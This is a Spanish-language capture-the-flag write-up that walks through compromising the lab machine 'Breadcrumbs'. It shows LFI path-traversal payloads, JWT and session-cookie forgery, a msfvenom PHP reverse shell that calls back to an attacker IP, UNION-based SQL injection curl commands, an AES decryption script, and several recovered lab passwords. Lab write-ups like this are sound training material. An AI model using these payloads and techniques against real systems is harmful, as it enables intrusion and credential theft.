# Breadcrumbs

**OS**: Windows \
**Dificultad**: Difícil \
**Puntos**: 40

## Resumen
- Local File Inclusion
- Json Web Token (JWT)
- PHPSESSID
- File Upload Reverse Shell
- Microsoft Sticky Notes
- Ghidra Reversing
- SQL Injection
- AES Decrypt

## Nmap Scan

`nmap -sV -sC -oN nmap.txt 10.10.10.228`

```
Nmap scan report for 10.10.10.228
Host is up (0.065s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 9d:d0:b8:81:55:54:ea:0f:89:b1:10:32:33:6a:a7:8f (RSA)
|   256 1f:2e:67:37:1a:b8:91:1d:5c:31:59:c7:c6:df:14:1d (ECDSA)
|_  256 30:9e:5d:12:e3:c6:b7:c6:3b:7e:1e:e7:89:7e:83:e4 (ED25519)
80/tcp   open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Library
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
|_http-title: Library
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
3306/tcp open  mysql?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

## Enumeración

En el puerto 80 encontramos solo un panel de busqueda.

![1](img/1.png)

Si mandamos datos vemos un parametro interesante llamado **method** con un valor de 0.

![2](img/2.png)

Si modificamos ese valor por un 1 obtendremos un error de la aplicacion. La aplicacion nos muestra que hace falta un parametro llamado **book** y que intenta obtener el contenido de ese parametro.

![3](img/3.png)

Enumerando directorios hay uno interesante llamado portal.

`gobuster dir -u http://10.10.10.228/ -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,dat`

![4](img/4.png)

![5](img/5.png)

### Local File Inclusion

Utilizando la vulnerabildad **LFI** podemos obtener el contenido de los archivos que controlan la funcionalidad de inicio de sesion.

Obtenemos el **login.php** y vemos que importa **authController.php**.

`book=../portal/login.php`

![6](img/6.png)

Dentro de **authController.php** tambien hace referencia al archivo **cookie.php** y encontramos la secret key con la que se generan los JWT tokens.

`book=../portal/authController.php`

![7](img/7.png)

![8](img/8.png)

![9](img/9.png)

```
secret_key = 6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e
```

En **cookie.php** se muestra como se generan las cookies de **PHPSESSID** y algo interesante es el comentario **Please DO NOT use default PHPSESSID; our security team says they are predictable**.

`book=../portal/cookie.php`

![10](img/10.png)

### Json Web Token (JWT) / PHPSESSID

En la pagina encontramos los usuarios activos.

![11](img/11.png)

Si creamos un usario nuevo e iniciamos sesion nos muestra los usuarios que tienen privilegios de admin.

![12](img/12.png)

Tambien se establecen 2 cookies y actualmente ya sabemos como se generan, esto nos permitira generar nuestras propias cookies.

![13](img/13.png)

Primero modificamos nuestro JWT con el usario **paul** ya que es el unico que se encuentra activo y con privilegios de admin.

![14](img/14.png)

Ahora generamos nuetro PHPSESSID con el mismo codigo de antes pero con algunas modificaciones.

##### cookie.php
```php
<?php

for ($i=0; $i <= 10; $i++){
    $username = "paul";
    $max = strlen($username) - 1;
    $seed = rand(0, $max);
    $key = "s4lTy_stR1nG_" . $username[$seed] . "(!528./9890";
    $session_cookie = $username.md5($key);

    echo $session_cookie;
    echo "\n";
}

?>
```

Vemos que se obtiene un par de cookies identicas, esta sera nuestra cookie correcta.

`php cookie.php`

![15](img/15.png)

Bien ahora modificamos nuestras cookies y tendremos acceso a funciones de admin.

![16](img/16.png)

### File Upload Reverse Shell

Creamos nuestro archivo zip que contendra nuestra reverse shell.

`msfvenom -p php/reverse_php LHOST=10.10.14.33 LPORT=1234 -f raw > shell.zip`

![17](img/17.png)

Subimos el zip, capturamos la peticion con BurpSuite y modificamos la palabra **zip** por **php**.

![18](img/18.png)

![19](img/19.png)

![20](img/20.png)

Ahora podemos consultar nuestra shell en la siguiente url pero antes levantamos nuestro netcat.

`http://10.10.10.228/portal/uploads/shell.php`

![21](img/21.png)

## Escalada de Privilegios (User)

Enumerando los archivos locales encontramos el siguiente **juliette.json** que contiene credenciales.

`type C:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData\juliette.json`

![22](img/22.png)

```
juliette : jUli901./())!
```

Con las credenciales nos conectamos por SSH.

`ssh juliette@10.10.10.228`

![23](img/23.png)

### Microsoft Sticky Notes

Utilizando winPEAS vemos varias rutas interesante en **C:\Users\juliette\AppData**.

![24](img/24.png)


Investigando mas a fondo y utilizando la enumeracion de passwords encontramos que estan almacenados los passwords en los archivos de Sticky Notes.

`dir C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState`

![25](img/25.png)

Obtenemos el password del usuario **development**.

`type C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite-wal`

![26](img/26.png)

```
development : fN3)sN5Ee@g
```

Ahora nos conectamos por SSH.

`ssh development@10.10.10.228`

![27](img/27.png)

## Escalada de Privilegios (Root)

Enumerando el directorio **Development** esta el archivo **Krypter_Linux**. Lo descargamos a nuestra maquina para analizarlo.

`scp development@10.10.10.228:/c:/Development/Krypter_Linux .`

![28](img/28.png)

### Ghidra Reversing

Utilizando Ghidra haremos reversing del binario y vemos que esta haciendo una petecion web con parametros.

![29](img/29.png)

Si consultamos la URL de forma local obtenemos una llave.

`curl "http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords"`

![30](img/30.png)

Modificando la consulta vemos errores de base de datos.

![31](img/31.png)

### SQL Injection

Probando injecciones SQL obtenemos el password cifrado del usuario Administrador.

- `curl "http://127.0.0.1:1234/index.php?method=select&username=administrator%27%20union%20select%20account%20from%20passwords--%20-&table=passwords"`
- `curl "http://127.0.0.1:1234/index.php?method=select&username=administrator%27%20union%20select%20password%20from%20passwords--%20-&table=passwords"`

![32](img/32.png)

Ahora que contamos con la llave y la cadena cifrada es posible obtener el password en texto plano con el siguiente script.

##### decrypt.py
```python
from base64 import b64decode
from Crypto.Cipher import AES

key = b"k19D193j.<19391("
password = b"H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw="
iv = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

def decrypt():
    raw = b64decode(password)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return cipher.decrypt(raw)

print(decrypt().decode())
```

`python3 decrypt.py`

![33](img/33.png)

```
Administrator : p@ssw0rd!@#$9890./
```

Procedemos a conectarnos por SSH.

`ssh administrator@10.10.10.228`

![34](img/34.png)

## Referencias
https://jwt.io/ \
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#sticky-notes-passwords
